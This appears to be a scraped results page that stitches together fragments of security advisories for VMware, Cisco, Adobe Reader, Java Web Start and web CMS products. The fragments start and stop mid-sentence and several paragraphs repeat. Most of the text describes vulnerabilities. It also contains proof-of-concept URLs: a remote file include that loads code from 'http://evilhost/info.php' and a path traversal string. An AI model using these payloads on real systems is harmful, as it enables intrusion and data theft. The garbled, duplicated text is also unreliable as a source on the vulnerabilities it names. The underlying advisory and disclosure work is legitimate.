Next Page >>
exploitation
user-mode code executing in a virtual machine may gain kernel
privileges within the virtual machine, dependent upon the guest
operating system. The flaws have been proven exploitable on x64
versions of Windows, and they have produced potentially exploitable
crashes on x64 versions of *BSD. The Linux kernel does not allow
exploitation of these flaws on x64 versions of Linux.
VULNERABILITY DETAILS
---------------------
This document describes two x64 instruction emulation flaws,
directly exploit Internet Explorer bugs or to target IE‟s security
configuration weaknesses.
In particular this attack vector exposes workstations to:
- - Direct remote execution of arbitrary commands without user interaction.
- - Direct exploitation of IE bugs without user interaction. For example,
exploitation bugs that normally require the user to click on a URL
provided by the attacker can be exploited directly using this attack
vector.
- - Direct injection of scripting code in Internet Explorer. For example,
remotely injecting JavaScript code into the embedded IE control of the
directly exploit Internet Explorer bugs or to target IE‟s security
configuration weaknesses.
In particular this attack vector exposes workstations to:
- - Direct remote execution of arbitrary commands without user interaction.
- - Direct exploitation of IE bugs without user interaction. For example,
exploitation bugs that normally require the user to click on a URL
provided by the attacker can be exploited directly using this attack
vector.
- - Direct injection of scripting code in Internet Explorer. For example,
remotely injecting JavaScript code into the embedded IE control of the
By exploiting the VMware flaw described in this document, user-mode
code executing in a virtual machine may gain kernel privileges within
the virtual machine, dependent upon the guest operating system. The
flaw has been proven exploitable on x64 versions of Windows, and it
has produced potentially exploitable crashes on x64 versions of *BSD.
The Linux kernel does not allow exploitation of the flaws on x64
versions of Linux.
VULNERABILITY DETAILS
---------------------
when specific TCP segments are received during the TCP connection
termination phase.
This vulnerability is triggered only when specific TCP segments are sent
to certain TCP-based services that terminate on the affected appliance.
Although exploitation of this vulnerability requires a TCP three-way
handshake, authentication is not required.
This vulnerability is documented in Cisco bug ID CSCsz77717 and has been
assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2010-0149.
Virtual PC technology to implement the backward compatibility XP Mode
for legacy Windows applications. Using XP Mode, Windows 7 users can run
Windows applications on a virtualized Windows XP SP3 operating system
directly from the Windows 7 desktop but in doing so they may be
inadvertently increasing their risk due to a bug that makes standard
Windows anti-exploitation mechanisms ineffective.
A vulnerability found in the memory management of the Virtual Machine
Monitor makes memory pages mapped above the 2GB available with read or
read/write access to user-space programs running in a Guest operating
system. By leveraging this vulnerability it is possible to bypass
Summary
=======
The Management Center for Cisco Security Agents is affected by a
directory traversal vulnerability and a SQL injection vulnerability.
Successful exploitation of the directory traversal vulnerability may
allow an authenticated attacker to view and download arbitrary files
from the server hosting the Management Center. Successful
exploitation of the SQL injection vulnerability may allow an
authenticated attacker to execute SQL statements that can cause
instability of the product or changes in the configuration.
http://[server]/[installdir]/admin/create_order_new.php?command=include_page&include_page=http://evilhost/info.php
1.2 Local File Include vulnerability found in script includes/events_application_top.php
Successful exploitation requires that "register_globals" is enabled.
Code
****
#################################################
Report Confidence - Confirmed
Impact
======
Successful exploitation of the Unauthenticated Java Servlet Access
(CSCtf42005) vulnerability could allow an unauthenticated, remote
attacker to take complete control of the affected device or system.
Successful exploitation of the CGI Command Injection (CSCtf97221)
vulnerability could allow an unauthenticated, remote attacker to take
IMPACT
------
The vulnerability described in this document can be exploited by a
malicious Web page to execute arbitrary code with low integrity.
Active scripting must be enabled, and the present exploitation
techniques require that font downloading be set to "Enable" or
"Prompt" and that the "mailto:" protocol be present. (These
requirements are satisfied by default on Windows XP, Windows Vista,
and Windows 7.) The user is presented with a message box which must
be dismissed before code execution can occur.
IMPACT
------
The vulnerability described in this document can be exploited by a
malicious Web page to execute arbitrary code with low integrity.
Active scripting must be enabled, and the present exploitation
techniques require that font downloading be set to "Enable" or
"Prompt" and that the "mailto:" protocol be present. (These
requirements are satisfied by default on Windows XP, Windows Vista,
and Windows 7.) The user is presented with a message box which must
be dismissed before code execution can occur.
==================
Apple AppStore
Product: Wifi Photo Transfer 2.1 & 1.1 Pro
Exploitation-Technique:
=======================
Remote
Severity:
vulnerability that an unauthenticated, remote user could exploit to
cause a denial of service condition.
An attacker could trigger this vulnerability by sending a crafted SSH
version 2 packet that may cause a new SSH connection handler process to
crash. Repeated exploitation may cause each new SSH connection handler
process to crash and lead to a significant amount of memory being
consumed, which could introduce instability that may adversely impact
other system functionality. During this event, the parent SSH daemon
process will continue to function normally.
======
Transparent Firewall Packet Buffer Exhaustion Vulnerability
+----------------------------------------------------------
Successful exploitation of this vulnerability could cause a decrease
in the number of available packet buffers. Repeated exploitation
could eventually deplete all available packet buffers, which may
cause an appliance to stop forwarding traffic.
SCCP Inspection Denial of Service Vulnerability
Impact
======
Successful exploitation of the Unauthenticated Java Servlet
(CSCtf42008, CSCtf01253) vulnerabilities could allow an
unauthenticated, remote attacker to take complete control of the
affected device.
Successful exploitation of the Unauthenticated Arbitrary File Upload
http://www.adobe.com/products/reader/
http://www.adobe.com/products/acrobat/
II. DESCRIPTION
Remote exploitation of a memory corruption vulnerability in multiple
versions of Adobe Systems Inc.'s Reader and Acrobat PDF reader and
processor could allow an attacker to execute arbitrary code with the
privileges of the current user.
The vulnerability occurs when processing the Jp2c stream of a JpxDecode
http://www.adobe.com/products/reader/
http://www.adobe.com/products/acrobatpro/
II. DESCRIPTION
Remote exploitation of a heap based buffer overflow vulnerability in
Adobe Systems Inc.'s Reader and Acrobat could allow an attacker to
execute arbitrary code with the privileges of the current user.
The vulnerability occurs when parsing a JBIG2-encoded stream inside of a
PDF file. JBIG2 is an image encoding format that is primarily used for
Individual PXE Encryption users are vulnerable to two message privacy
vulnerabilities that could allow an attacker to gain access to
sensitive information. All the vulnerabilities require an attacker to
first intercept a secure e-mail message as a condition for successful
exploitation. Attackers can obtain secure e-mail messages by
monitoring a network or a compromised user e-mail account.
The IronPort Encryption Appliance contains a logic error that could
allow an attacker to obtain the unique, per-message decryption key
that is used to protect the content of an intercepted secure e-mail
third-party library used by Lotus Notes to process Lotus 1-2-3 file
attachments.
These vulnerabilities could allow attackers to remotely execute arbitrary
commands on vulnerable systems by attaching a specially crafted file that
triggers exploitation when unsuspecting users attempt to “View€? the
attachment. Exploitation of these vulnerabilities requires user intervention.
Although these specific vulnerabilities exist on a third–party component
the problem is compound by the way Lotus Notes displays information about
attachments, making it easier to elicit unsuspecting assistance from the
Report Confidence - Confirmed
Impact
======
Successful exploitation of the Unauthenticated CGI Access
(CSCtb31640) vulnerability could allow an unauthenticated, remote
attacker to take complete control of an affected device or system.
Successful exploitation of the CGI Command Injection (CSCtb31659,
CSCtb31685, and CSCth24672) vulnerabilities could allow an
confidential data, propagation of worms, and other threats to the
corporate network.
A DoS vulnerability affects the MSN IM inspection feature of Cisco
ASA 5500 Series Adaptive Security Appliances. During successful
exploitation, an unauthenticated attacker could cause the affected
device to reload and may result in a sustained DoS condition.
Note: Only transit traffic can trigger this vulnerability; traffic that
is destined to the appliance will not trigger the vulnerability. MSN IM
inspection is not enabled by default.
The following PoC is available:
http://[host]/exportcsv/exportcsv_index.php?action=export_page&module=../../../../tmp/file
Successful exploitation of this vulnerability requires attacker to be registered and logged-in.
2) Input passed via the "sel_domain_id" POST parameter to /obm.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
==================
iScripts
Product: Reserve Logic (Booking) CMS v1.2
Exploitation-Technique:
=======================
Remote
Severity:
==================
Trend Micro
Product: DirectPass 1.5.0.1060
Exploitation-Technique:
=======================
Local
Severity:
http://www.adobe.com/products/reader/
http://www.adobe.com/products/acrobatpro/
II. DESCRIPTION
Remote exploitation of an integer overflow vulnerability in multiple
versions of Adobe Systems Inc's Reader and Acrobat PDF reader and
processor could allow an attacker to execute arbitrary code with the
privileges of the current user.
The vulnerability occurs when parsing a FlateDecode filter inside a PDF
that contains AS path segments made up of more than one thousand
autonomous systems, the device may crash with memory corruption, and
the error "%%Software-forced reload" will be displayed.
The following three conditions are required for successful
exploitation of this vulnerability:
* Affected Cisco IOS Software device is a 4-byte AS number BGP
speaker
* BGP peering neighbor is a 2-byte AS number BGP speaker
* BGP peering neighbor is capable of sending a BGP update with a
the JWS application. This XML-based file contains various parameters
that describe the Java application to be run.
II. DESCRIPTION
Remote exploitation of a heap corruption vulnerability in Sun
Microsystems Inc.'s Java Web Start could allow an attacker to execute
arbitrary code with privileges of the current user.
When JWS starts up, it displays a splash screen. By default, the image
displayed on this splash screen is a GIF file provided by Sun, but it
http://www.java.com
II. DESCRIPTION
Remote exploitation of an integer overflow vulnerability in Sun
Microsystems Inc.'s Java Web Start could allow an attacker to execute
arbitrary code with privileges of the current user.
When JWS starts up, it displays a splash screen. By default, the image
displayed on this splash screen is a GIF file provided by Sun, but it
=======
Multiple vulnerabilities exist in the Cisco Application Networking
Manager (ANM) and Cisco Application Control Engine (ACE) Device
Manager applications. These vulnerabilities are independent of each
other. Successful exploitation of these vulnerabilities may result in
unauthorized system or host operating system access.
This security advisory identifies the following vulnerabilities:
* ACE Device Manager and ANM invalid directory permissions
http://java.sun.com/javase/technologies/desktop/javawebstart/index.jsp
II. DESCRIPTION
Remote exploitation of a memory corruption vulnerability in Sun
Microsystems Inc.'s Java Web Start could allow an attacker to execute
arbitrary code with the privileges of the current user.
When JWS starts up, it displays a splash screen. By default, the image
displayed on this splash screen is a GIF file provided by Sun, but it
Next Page>>
|
